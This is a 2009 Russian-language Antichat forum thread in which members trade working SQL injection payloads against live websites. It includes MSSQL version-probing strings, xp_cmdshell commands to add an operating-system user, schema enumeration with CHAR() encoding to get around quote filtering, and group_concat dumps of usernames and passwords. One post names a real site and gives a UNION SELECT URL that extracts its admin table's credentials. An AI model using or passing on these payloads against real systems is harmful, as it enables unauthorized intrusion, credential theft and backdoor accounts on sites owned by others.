ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.01.2009, 19:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
если есть вывод or 1=@@version, возможно )--+, как уже сказали выше без ссылки можно долго прыгать вокруг скули с бубном
/add попробуй
(select+top+1+column_name+from+information _schema.columns+where+table_name='t')
Последний раз редактировалось l1ght; 02.03.2009 в 13:49..
|
|
|
20.01.2009, 19:06
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148
Репутация:
13
|
|
1 or 1=@@version
Incorrect syntax near '@@version'.
1 or 1=@@version--
Incorrect syntax near '@@version'.
выводит когда просто
site.com/chk/chk.asp?ID=@@version
|
|
|
|
20.01.2009, 19:41
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148
Репутация:
13
|
|
хорошо, тогда такой вапрос, как добавить юзера через скуль?
mssql - юзер sa
А то я все перевробывал
;exec%20master..xp_cmdshell%20'net%20user%20user%2 0xek%20/add';--
Incorrect syntax near the keyword 'exec'.
1;exec%20master..xp_cmdshell%20'net%20user%20user% 20xek%20/add';--
Incorrect syntax near 'xec'.
1';exec%20master..xp_cmdshell%20'net%20user%20user %20xek%20/add';--
Incorrect syntax near '''.
1%20or%201=;exec%20master..xp_cmdshell%20[net%20user%20user%20xek%20/add];--
An expression of non-boolean type specified in a context where a condition is expected, near 'xec'.
|
|
|
|
21.01.2009, 01:13
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от l1ght
если есть вывод or 1=@@version, возможно )--+, как уже сказали выше без ссылки можно долго прыгать вокруг скули с бубном
/add попробуй
1) (select+top+1+column_name+from+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)
2) (select+top+1+column_name+from+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)--+
3) (select+top+1+column_name+from+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)'--+
разве mssql принимает значения в хексе, начинающиеся с 0x? От фильтрации кавычек помогает char(), но никак не хекс как для MySQL. Сомневаюсь, что дело именно в кавычках, но стоит попробовать так:
(select+top+1+column_name+from+information _schema.columns+where+table_name=CHAR(116)%2BCHAR( 98)%2BCHAR(108)%2BCHAR(65)%2BCHAR(99)%2BCHAR(99)%2 BCHAR(111)%2BCHAR(117)%2BCHAR(110)%2BCHAR(116)%2BC HAR(115))
Кстати в mssql пробел после -- не нужен
|
|
|
|
21.01.2009, 01:26
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
челы нужно phppgadmin как r57mysql одним php файлом
и еще вот скуля )
http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1
Последний раз редактировалось sabe; 21.01.2009 в 04:44..
|
|
|
|
21.01.2009, 06:21
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Подскажите, можно ли такое сделать.
Вывожу инфу:
group_concat(name,0x3a,pass,0x3a,city)
Выплывает это все одной большой партянкой и все слитно, то есть все записи в одной строке через двоеточие, пример:
admin:admin:belmor:root:root:belmor - ну и так далее!
вопрос:
Можно ли вывести информацию, что бы каждая записи выводилась с новой строки:
admin:admin:belmor
root:root:belmor
Thx.
|
|
|
|
21.01.2009, 09:32
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от sabe
челы нужно phppgadmin как r57mysql одним php файлом
и еще вот скуля )
Это Microsoft Access.
Код:
http://www.contecmed.com/cart/product_show.asp?id=38+and+1=1+union+select+1,2,3,4,5,6,7,8,9,0,11,12+from+news
вопрос:
Можно ли вывести информацию, что бы каждая записи выводилась с новой строки:
admin:admin:belmor
root:root:belmor
Thx.
Хм.. ну попробуй group_concat(name,0x3a,pass,0x3a,city,0x0a)
Не всегда работает..
Последний раз редактировалось R1dex; 21.01.2009 в 09:55..
|
|
|
|
21.01.2009, 10:00
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
R1dex, да, что-то не хочет.
|
|
|
|
21.01.2009, 10:21
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от sabe
и еще вот скуля )
Код:
http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1
Код:
http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1+union+select+1,2,3,4,5,6,7,pass,9,user,11,12+from+admin
|
|
|
|
21.01.2009, 14:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от [Raz0r]
разве mssql принимает значения в хексе, начинающиеся с 0x? От фильтрации кавычек помогает char(), но никак не хекс как для MySQL. Сомневаюсь, что дело именно в кавычках, но стоит попробовать так:
(select+top+1+column_name+from+information _schema.columns+where+table_name=CHAR(116)%2BCHAR( 98)%2BCHAR(108)%2BCHAR(65)%2BCHAR(99)%2BCHAR(99)%2 BCHAR(111)%2BCHAR(117)%2BCHAR(110)%2BCHAR(116)%2BC HAR(115))
Кстати в mssql пробел после -- не нужен
не обратил внимания (скопировал запрос выше), имелось (предполагалась) ввиду не фильтровация ковычек, а в пропавшая после -- ' <=> near ''' & near 'accid', суть была в том что бы закрыть предыдущее условие/подзапрос; ступил, т.к. можно было его и не закрывать-- (работать с этим условием)
насчет пробела, маслом кашу не испортишь, привычка с mysql
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1070504){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Линейный вид
